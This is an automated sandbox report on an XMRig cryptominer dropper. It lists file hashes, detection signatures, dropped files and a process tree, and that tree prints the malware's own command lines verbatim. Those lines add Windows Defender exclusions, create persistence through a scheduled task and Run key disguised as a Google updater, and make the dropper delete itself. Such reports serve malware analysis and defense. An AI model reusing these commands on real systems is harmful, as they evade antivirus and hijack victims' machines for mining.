Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1800s
  • max time network
    1782s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/M8xUNW42QxTLMRXN.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3496
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1020
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3324
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5080
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:5084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3556
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:400
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3356
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1484
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:2272
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:2244
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:1748

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.1MB

            MD5

            28f2d0b8c4864b1664e8b739a32a6129

            SHA1

            14606d7ce3efe0a7ffb659a21f7702ac1f419acb

            SHA256

            f775d7d45482d074cae43699e50de4e725b11724859e3bf42ac16ca1466f2bd5

            SHA512

            a18bb989b004563a64a50c25eb126c80c4edc0a27f185a217c7047c528b2c1121c573801be68af923e6fd6e4a2d24fd3e460f1381b9ca6f49e0d218b01a81ca3

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            125KB

            MD5

            3e333b1f46a2bd307d0e18104ed2e737

            SHA1

            3eed2f52d9f99e100391e6d33f5112e68b66d1bc

            SHA256

            f2bcb362142c10797740bcebaeb27866805dfd48c6571005d45638b4de662e4d

            SHA512

            28f414c1286dbeb969a3691acd9178b2c8b287530239b6a71d1d22f64c0c92a24bf55bdda8bad69cc9cae33c96c4283c83b27d02518c4e6b1577e569f10b4a9d

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e8e3af4111b4dbc5678a7a1374968c03

            SHA1

            80bc9516932accbef00602356fbca65a9bb2879c

            SHA256

            67946f37b2a5c6588b7b133996d7c00646e9ef8d01ffe2d34c7cd5627613aa5a

            SHA512

            853b8c30b544a7ceb84cae119883af3cf75880a3d21ec0fb5ff16464a202ea167b96fad6a62137906ad31b5b9ad4445cb083d45ea6d0f2f2127222ca389b2ebf

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah5sreun.eme.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1020-29-0x000002CF327A0000-0x000002CF327B0000-memory.dmp
            Filesize

            64KB

          • memory/1020-27-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/1020-31-0x000002CF327A0000-0x000002CF327B0000-memory.dmp
            Filesize

            64KB

          • memory/1020-33-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/1020-30-0x000002CF327A0000-0x000002CF327B0000-memory.dmp
            Filesize

            64KB

          • memory/1484-52-0x00007FF7A8620000-0x00007FF7A8831000-memory.dmp
            Filesize

            2.1MB

          • memory/1484-120-0x00007FF7A8620000-0x00007FF7A8831000-memory.dmp
            Filesize

            2.1MB

          • memory/2104-11-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/2104-13-0x0000018077D40000-0x0000018077D50000-memory.dmp
            Filesize

            64KB

          • memory/2104-12-0x0000018077D40000-0x0000018077D50000-memory.dmp
            Filesize

            64KB

          • memory/2104-1-0x0000018077770000-0x0000018077792000-memory.dmp
            Filesize

            136KB

          • memory/2104-16-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/2272-165-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-145-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-179-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-177-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-175-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-173-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-171-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-169-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-167-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-138-0x00000231AA630000-0x00000231AA650000-memory.dmp
            Filesize

            128KB

          • memory/2272-163-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-161-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-159-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-157-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-155-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-153-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-151-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-183-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-149-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-185-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-147-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-181-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-143-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-137-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-141-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-139-0x00000231AA650000-0x00000231AA670000-memory.dmp
            Filesize

            128KB

          • memory/2272-187-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-121-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-189-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-135-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-125-0x000002319A1B0000-0x000002319A1D0000-memory.dmp
            Filesize

            128KB

          • memory/2272-126-0x00000231AA610000-0x00000231AA630000-memory.dmp
            Filesize

            128KB

          • memory/2272-133-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-128-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2272-129-0x00000231AA630000-0x00000231AA650000-memory.dmp
            Filesize

            128KB

          • memory/2272-130-0x00000231AA650000-0x00000231AA670000-memory.dmp
            Filesize

            128KB

          • memory/2272-132-0x00007FF6D7330000-0x00007FF6D7B24000-memory.dmp
            Filesize

            8.0MB

          • memory/2456-35-0x00007FF797860000-0x00007FF797A71000-memory.dmp
            Filesize

            2.1MB

          • memory/2456-0-0x00007FF797860000-0x00007FF797A71000-memory.dmp
            Filesize

            2.1MB

          • memory/3356-127-0x00007FF68DC40000-0x00007FF68DC56000-memory.dmp
            Filesize

            88KB

          • memory/3356-134-0x00007FF68DC40000-0x00007FF68DC56000-memory.dmp
            Filesize

            88KB

          • memory/3556-112-0x000001B2E3B60000-0x000001B2E3C15000-memory.dmp
            Filesize

            724KB

          • memory/3556-116-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/3556-114-0x000001B2E1760000-0x000001B2E1770000-memory.dmp
            Filesize

            64KB

          • memory/3556-113-0x000001B2E1760000-0x000001B2E1770000-memory.dmp
            Filesize

            64KB

          • memory/3556-100-0x000001B2E1760000-0x000001B2E1770000-memory.dmp
            Filesize

            64KB

          • memory/3556-101-0x000001B2E1760000-0x000001B2E1770000-memory.dmp
            Filesize

            64KB

          • memory/3556-99-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/4324-88-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/4324-85-0x000001BCE08F0000-0x000001BCE0900000-memory.dmp
            Filesize

            64KB

          • memory/4324-84-0x000001BCE2F90000-0x000001BCE2F9A000-memory.dmp
            Filesize

            40KB

          • memory/4324-83-0x000001BCE2F80000-0x000001BCE2F86000-memory.dmp
            Filesize

            24KB

          • memory/4324-81-0x000001BCE2FA0000-0x000001BCE2FBA000-memory.dmp
            Filesize

            104KB

          • memory/4324-82-0x000001BCE2F50000-0x000001BCE2F58000-memory.dmp
            Filesize

            32KB

          • memory/4324-80-0x000001BCE2F40000-0x000001BCE2F4A000-memory.dmp
            Filesize

            40KB

          • memory/4324-79-0x000001BCE2F60000-0x000001BCE2F7C000-memory.dmp
            Filesize

            112KB

          • memory/4324-78-0x000001BCE2DF0000-0x000001BCE2DFA000-memory.dmp
            Filesize

            40KB

          • memory/4324-77-0x000001BCE2D30000-0x000001BCE2DE5000-memory.dmp
            Filesize

            724KB

          • memory/4324-75-0x000001BCE2D10000-0x000001BCE2D2C000-memory.dmp
            Filesize

            112KB

          • memory/4324-76-0x000001BCE08F0000-0x000001BCE0900000-memory.dmp
            Filesize

            64KB

          • memory/4324-65-0x00007FF454A20000-0x00007FF454A30000-memory.dmp
            Filesize

            64KB

          • memory/4324-63-0x000001BCE08F0000-0x000001BCE0900000-memory.dmp
            Filesize

            64KB

          • memory/4324-64-0x000001BCE08F0000-0x000001BCE0900000-memory.dmp
            Filesize

            64KB

          • memory/4324-62-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/5080-51-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/5080-45-0x00007FF85F490000-0x00007FF85FF51000-memory.dmp
            Filesize

            10.8MB

          • memory/5080-46-0x00000223E1420000-0x00000223E1430000-memory.dmp
            Filesize

            64KB

          • memory/5080-47-0x00000223E1420000-0x00000223E1430000-memory.dmp
            Filesize

            64KB